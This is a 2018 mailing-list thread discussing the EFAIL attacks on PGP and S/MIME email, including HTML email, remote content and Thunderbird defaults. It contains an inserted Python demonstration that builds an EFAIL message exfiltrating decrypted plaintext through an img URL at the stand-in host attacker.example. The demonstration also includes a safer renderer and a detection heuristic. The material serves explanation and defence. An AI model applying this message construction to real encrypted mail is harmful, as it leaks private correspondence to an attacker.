EFail - OpenPGP S/MIME Vulnerability
https://efail.de/
https://lists.gnupg.org/pipermail/gnupg-users/2018-May/060315.html
https://efail.de/efail-attack-paper.pdf
https://twitter.com/matthew_d_green/status/995989254143606789
https://news.ycombinator.com/item?id=17064129
https://www.eff.org/deeplinks/2018/05/attention-pgp-users-new-vulnerabilitie...
https://arstechnica.com/information-technology/2018/05/critical-pgp-and-smim...

The EFAIL attacks break PGP and S/MIME email encryption by coercing clients into sending the full plaintext of the emails to the attacker. In a nutshell, EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs. To create these exfiltration channels, the attacker first needs access to the encrypted emails, for example, by eavesdropping on network traffic, compromising email accounts, email servers, backup systems or client computers. The emails could even have been collected years ago.
On 05/14/2018 01:48 PM, grarpamp wrote:
> https://efail.de/
> https://lists.gnupg.org/pipermail/gnupg-users/2018-May/060315.html
> https://efail.de/efail-attack-paper.pdf
> https://twitter.com/matthew_d_green/status/995989254143606789
> https://news.ycombinator.com/item?id=17064129
> https://www.eff.org/deeplinks/2018/05/attention-pgp-users-new-vulnerabilitie...
> https://arstechnica.com/information-technology/2018/05/critical-pgp-and-smim...
>
> The EFAIL attacks break PGP and S/MIME email encryption by coercing clients into sending the full plaintext of the emails to the attacker. In a nutshell, EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs. To create these exfiltration channels, the attacker first needs access to the encrypted emails, for example, by eavesdropping on network traffic, compromising email accounts, email servers, backup systems or client computers. The emails could even have been collected years ago.
Hmm. No time to dig into this just now, but at first glance: "EFAIL abuses active content of HTML emails" ... indicating that this attack would most likely affect people who run wide-open systems. Takeaway: E-mail messages != web pages, and processing them as such invites a world of stupidly unnecessary problems.
On 05/14/2018 06:48 AM, grarpamp wrote:
> https://efail.de/
> https://lists.gnupg.org/pipermail/gnupg-users/2018-May/060315.html
> https://efail.de/efail-attack-paper.pdf
> https://twitter.com/matthew_d_green/status/995989254143606789
> https://news.ycombinator.com/item?id=17064129
> https://www.eff.org/deeplinks/2018/05/attention-pgp-users-new-vulnerabilitie...
> https://arstechnica.com/information-technology/2018/05/critical-pgp-and-smim...
>
> The EFAIL attacks break PGP and S/MIME email encryption by coercing clients into sending the full plaintext of the emails to the attacker. In a nutshell, EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs. To create these exfiltration channels, the attacker first needs access to the encrypted emails, for example, by eavesdropping on network traffic, compromising email accounts, email servers, backup systems or client computers. The emails could even have been collected years ago.
Thanks. That's the clearest explanation I've seen.
On 05/14/2018 07:49 PM, Mirimir wrote:
> On 05/14/2018 06:48 AM, grarpamp wrote:
>> https://efail.de/
>> https://lists.gnupg.org/pipermail/gnupg-users/2018-May/060315.html
>> https://efail.de/efail-attack-paper.pdf
>> https://twitter.com/matthew_d_green/status/995989254143606789
>> https://news.ycombinator.com/item?id=17064129
>> https://www.eff.org/deeplinks/2018/05/attention-pgp-users-new-vulnerabilitie...
>> https://arstechnica.com/information-technology/2018/05/critical-pgp-and-smim...
>>
>> The EFAIL attacks break PGP and S/MIME email encryption by coercing clients into sending the full plaintext of the emails to the attacker. In a nutshell, EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs. To create these exfiltration channels, the attacker first needs access to the encrypted emails, for example, by eavesdropping on network traffic, compromising email accounts, email servers, backup systems or client computers. The emails could even have been collected years ago.
>
> Thanks. That's the clearest explanation I've seen.
Remember the campaign against HTML email? I do. We were right.

--- Marina
On 05/14/2018 06:05 PM, Marina Brown wrote:
> On 05/14/2018 07:49 PM, Mirimir wrote:
>> On 05/14/2018 06:48 AM, grarpamp wrote:
>>> https://efail.de/
>>> https://lists.gnupg.org/pipermail/gnupg-users/2018-May/060315.html
>>> https://efail.de/efail-attack-paper.pdf
>>> https://twitter.com/matthew_d_green/status/995989254143606789
>>> https://news.ycombinator.com/item?id=17064129
>>> https://www.eff.org/deeplinks/2018/05/attention-pgp-users-new-vulnerabilitie...
>>> https://arstechnica.com/information-technology/2018/05/critical-pgp-and-smim...
>>>
>>> The EFAIL attacks break PGP and S/MIME email encryption by coercing clients into sending the full plaintext of the emails to the attacker. In a nutshell, EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs. To create these exfiltration channels, the attacker first needs access to the encrypted emails, for example, by eavesdropping on network traffic, compromising email accounts, email servers, backup systems or client computers. The emails could even have been collected years ago.
>>
>> Thanks. That's the clearest explanation I've seen.
>
> Remember the campaign against HTML email? I do. We were right.
>
> --- Marina
Right, and its evil child, remote content. I always disable HTML. And fetching of remote content. And I have since the 90s. I got that from this list :) It's funny that these exploits depend on both. And that some on HN put it all on pgp/gpg, arguing that one can't expect users to know this stuff. By default, Thunderbird does render HTML. But at least it doesn't fetch remote content. So Thunderbird+Enigmail users should be safe.
On 05/15/2018 02:14 AM, Mirimir wrote:
> On 05/14/2018 06:05 PM, Marina Brown wrote:
>> On 05/14/2018 07:49 PM, Mirimir wrote:
>>> On 05/14/2018 06:48 AM, grarpamp wrote:
>>>> https://efail.de/
>>>> https://lists.gnupg.org/pipermail/gnupg-users/2018-May/060315.html
>>>> https://efail.de/efail-attack-paper.pdf
>>>> https://twitter.com/matthew_d_green/status/995989254143606789
>>>> https://news.ycombinator.com/item?id=17064129
>>>> https://www.eff.org/deeplinks/2018/05/attention-pgp-users-new-vulnerabilitie...
>>>> https://arstechnica.com/information-technology/2018/05/critical-pgp-and-smim...
>>>>
>>>> The EFAIL attacks break PGP and S/MIME email encryption by coercing clients into sending the full plaintext of the emails to the attacker. In a nutshell, EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs. To create these exfiltration channels, the attacker first needs access to the encrypted emails, for example, by eavesdropping on network traffic, compromising email accounts, email servers, backup systems or client computers. The emails could even have been collected years ago.
>>>
>>> Thanks. That's the clearest explanation I've seen.
>>
>> Remember the campaign against HTML email? I do. We were right.
>>
>> --- Marina
>
> Right, and its evil child, remote content.
> I always disable HTML. And fetching of remote content.
> And I have since the 90s. I got that from this list :)
> It's funny that these exploits depend on both. And that some on HN put it all on pgp/gpg, arguing that one can't expect users to know this stuff. By default, Thunderbird does render HTML. But at least it doesn't fetch remote content. So Thunderbird+Enigmail users should be safe.
Honestly I'm missing PINE and ELM right about now.

--- Marina
Various:
> Remember the campaign against HTML email? I do. We were right.
> I always disable HTML. And fetching of remote content.
> And I have since the 90s. I got that from this list :)
> Honestly I'm missing PINE and ELM right about now.
trn, ftw. There's neomutt, which seems popular for text mail these days, since mutt was also seen being dormant.
On 05/15/2018 12:05 AM, Marina Brown wrote:
> Remember the campaign against HTML email? I do. We were right.
The campaign is still ongoing. Maybe we have lost in the case of the vast majority of marketing/advertising lists, but Thunderbird and other email clients (thankfully) offer the option to not automatically load external links by default. I do think a future version (actually, the next version) of Thunderbird and/or Enigmail needs to put up a big huge "danger" warning when they detect HTML email mixed with encrypted content, especially when it looks like someone has tried to put an encrypted blob as the destination of a link (which, as I understand it, is how this exploit works). There's no good reason to do this, and plenty of bad reasons.

--
Shawn K. Quinn <skquinn@rushpost.com>
http://www.rantroulette.com
http://www.skqrecordquest.com
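The message shape grarpamp's summary describes at the top of the thread (attacker-controlled HTML wrapped around a captured ciphertext so that the decrypted text ends up inside a URL the client fetches) and the "danger" check Shawn asks for here, as an added example in Python. This is not code from the thread, from efail.de or from any mail client: attacker.example, the victim address, the message text and the armored blob are constructed for the demo, "decryption" is a lookup rather than OpenPGP, and looks_like_efail is a heuristic of my own (an HTML part whose last quoted attribute is left open, directly followed by an encrypted part), not a rule from Thunderbird or Enigmail.

```python
"""Added example, not code from the thread or from efail.de: the shape of an
EFAIL direct-exfiltration message and what two kinds of client do with it.

  part 1  text/html            <img src="http://attacker.example/leak?   (tag left open)
  part 2  multipart/encrypted  the captured PGP/MIME ciphertext, untouched
  part 3  text/html            ">

A client that decrypts part 2 and renders all parts as ONE HTML document gets
a single <img> whose src holds the plaintext, and its HTML engine fetches it.
Everything below is constructed for the demo; there is no real crypto here."""
import re
from email import encoders
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

ATTACKER_URL = "http://attacker.example/leak?"          # constructed, not a real host
# Constructed stand-in for a ciphertext the attacker captured earlier.
CAPTURED_CIPHERTEXT = (b"-----BEGIN PGP MESSAGE-----\n"
                       b"hQEMA0000000000000000000000000000000=\n"
                       b"-----END PGP MESSAGE-----\n")
PLAINTEXT = "Meet at the usual place at 21:00. Bring the documents."


def fake_decrypt(blob):
    """Stand-in for the client's OpenPGP decrypt call."""
    return PLAINTEXT if blob == CAPTURED_CIPHERTEXT else None


def wrap_ciphertext(before_html, after_html):
    """multipart/mixed: attacker HTML, the captured PGP/MIME part, more attacker HTML."""
    enc = MIMEMultipart("encrypted", protocol="application/pgp-encrypted")
    enc.attach(MIMEApplication(b"Version: 1\n", "pgp-encrypted",
                               _encoder=encoders.encode_7or8bit))
    enc.attach(MIMEApplication(CAPTURED_CIPHERTEXT, "octet-stream",
                               _encoder=encoders.encode_7or8bit))
    outer = MIMEMultipart("mixed")
    outer["From"], outer["To"] = "attacker@attacker.example", "victim@example.org"
    outer.attach(MIMEText(before_html, "html"))
    outer.attach(enc)
    outer.attach(MIMEText(after_html, "html"))
    return outer


def build_efail_message():
    # The src attribute is left open; part 3 closes it after the plaintext.
    return wrap_ciphertext(f'<img src="{ATTACKER_URL}', '">')


def decrypt_part(part):
    """Plaintext for a multipart/encrypted part, None for anything else."""
    if part.get_content_type() != "multipart/encrypted":
        return None
    return fake_decrypt(part.get_payload()[1].get_payload(decode=True))


def render_vulnerable(msg):
    """Concatenate all parts into one document: plaintext lands inside the open tag."""
    doc = []
    for part in msg.get_payload():
        plain = decrypt_part(part)
        if plain is not None:
            doc.append(plain)
        elif part.get_content_type() == "text/html":
            doc.append(part.get_payload(decode=True).decode())
    return "".join(doc)


def render_isolated(msg, allow_remote=False):
    """Each part is its own document; decrypted text never meets attacker HTML.
    With allow_remote=False (the Thunderbird default the thread mentions) remote
    src/href values in HTML parts are neutralised before rendering."""
    docs = []
    for part in msg.get_payload():
        plain = decrypt_part(part)
        if plain is not None:
            docs.append(("decrypted", plain))
        elif part.get_content_type() == "text/html":
            body = part.get_payload(decode=True).decode()
            if not allow_remote:
                body = re.sub(r'(?i)\b(src|href)\s*=\s*"https?://[^"]*"?', r'\1="blocked:"', body)
            docs.append(("html", body))
    return docs


def outbound_urls(html_doc):
    """URLs an HTML engine would request while rendering html_doc."""
    return re.findall(r'(?is)<(?:img|link)\b[^>]*?(?:src|href)\s*=\s*"(https?://[^"]*)"', html_doc)


def looks_like_efail(msg):
    """Heuristic (my own, not a mail client's rule) for the warning Shawn proposes:
    an HTML part whose last quoted attribute is left open, directly before an encrypted part."""
    parts = msg.get_payload() if msg.is_multipart() else []
    for before, after in zip(parts, parts[1:]):
        if (before.get_content_type() == "text/html"
                and after.get_content_type() == "multipart/encrypted"
                and before.get_payload(decode=True).decode().count('"') % 2 == 1):
            return True
    return False


if __name__ == "__main__":
    m = build_efail_message()
    print("vulnerable client requests:", outbound_urls(render_vulnerable(m)))
    html_docs = [d for kind, d in render_isolated(m) if kind == "html"]
    print("isolating client requests:", [u for d in html_docs for u in outbound_urls(d)])
    print("warn the user:", looks_like_efail(m))
```

Two things worth noticing when running it. The concatenating renderer produces one `<img>` whose src starts with the attacker's URL and continues with the whole plaintext, which is exactly the request grarpamp's summary describes. The isolating renderer requests nothing even with `allow_remote=True`, because the `<img>` tag in part 1 is never completed once the decrypted text is kept in its own document; blocking remote content is the user-side belt, keeping decrypted output out of attacker-supplied markup is the client-side braces.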
On 05/16/2018 01:27 PM, Shawn K. Quinn wrote:
> On 05/15/2018 12:05 AM, Marina Brown wrote:
>> Remember the campaign against HTML email? I do. We were right.
>
> The campaign is still ongoing. Maybe we have lost in the case of the vast majority of marketing/advertising lists, but Thunderbird and other email clients (thankfully) offer the option to not automatically load external links by default.
The default in a fresh Thunderbird install is to _not_ fetch remote resources. I've verified that in an Ubuntu LiveCD.
> I do think a future version (actually, the next version) of Thunderbird and/or Enigmail needs to put up a big huge "danger" warning when they detect HTML email mixed with encrypted content, especially when it looks like someone has tried to put an encrypted blob as the destination of a link (which, as I understand it, is how this exploit works). There's no good reason to do this, and plenty of bad reasons.
That's a great idea. The best solution, I believe, would be a tweak to GnuPG that entirely breaks HTML and embedded remote content. That would protect against Efail, no matter how email clients were configured. It'd also protect against other exploits that depend on fetching remote content. And it wouldn't require users to entirely forgo HTML and embedded remote content. Just with GnuPG.
On 05/14/2018 01:48 PM, grarpamp wrote:
> The EFAIL attacks break PGP and S/MIME email encryption by coercing clients into sending the full plaintext of the emails to the attacker.
Werner & Co. respond:
https://lists.gnupg.org/pipermail/gnupg-users/2018-May/060334.html

Spoiler: If your e-mail client software is not borken and malconfigured, this is Not A Thing. If it is, you lost the game a long time ago because you don't know anything about the rules, the board, the pieces or the objective.

:o/
On Wed, 16 May 2018 01:52:12 -0400 Steve Kinney <admin@pilobilus.net> wrote:
> On 05/14/2018 01:48 PM, grarpamp wrote:
>> The EFAIL attacks break PGP and S/MIME email encryption by coercing clients into sending the full plaintext of the emails to the attacker.
>
> Werner & Co. respond:
> https://lists.gnupg.org/pipermail/gnupg-users/2018-May/060334.html
>
> Spoiler: If your e-mail client software is not borken and malconfigured, this is Not A Thing.
it doesn't have to be broken as far as I can tell. The trick to get your client to decrypt a message and send the plaintext conforms to the 'mime' protocol garbage. It's a FEATURE not a bug!! =P
> If it is, you lost the game a long time ago because you don't know anything about the rules, the board, the pieces or the objective.
>
> :o/
On 05/16/2018 09:05 PM, juan wrote:
> On Wed, 16 May 2018 01:52:12 -0400 Steve Kinney <admin@pilobilus.net> wrote:
>> On 05/14/2018 01:48 PM, grarpamp wrote:
>>> The EFAIL attacks break PGP and S/MIME email encryption by coercing clients into sending the full plaintext of the emails to the attacker.
>>
>> Werner & Co. respond:
>> https://lists.gnupg.org/pipermail/gnupg-users/2018-May/060334.html
>>
>> Spoiler: If your e-mail client software is not borken and malconfigured, this is Not A Thing.
>
> it doesn't have to be broken as far as I can tell. The trick to get your client to decrypt a message and send the plaintext conforms to the 'mime' protocol garbage.
>
> It's a FEATURE not a bug!! =P
Aw, you know perfectly well what I mean: Friends don't let friends' e-mail software obey external commands to fetch and (worse) display or execute arbitrary content from arbitrary sources. "Active content" provides a vast array of practical attack vectors to those whose chosen tools /enable/ that content to do so. On purpose. For no reason half worth the exposure. By default, professional quality tools do no such thing unless prompted by the user, bless its pointy little head. Consider for example Mozilla Thunderbird: All-platform, full service on all fronts (access your webmail accounts via IMAP and render them as plain text, for God's sake!), and Free as in if you don't like it, go hack on the code yourself or hire it done to your specifications. :o)
participants (6): grarpamp, juan, Marina Brown, Mirimir, Shawn K. Quinn, Steve Kinney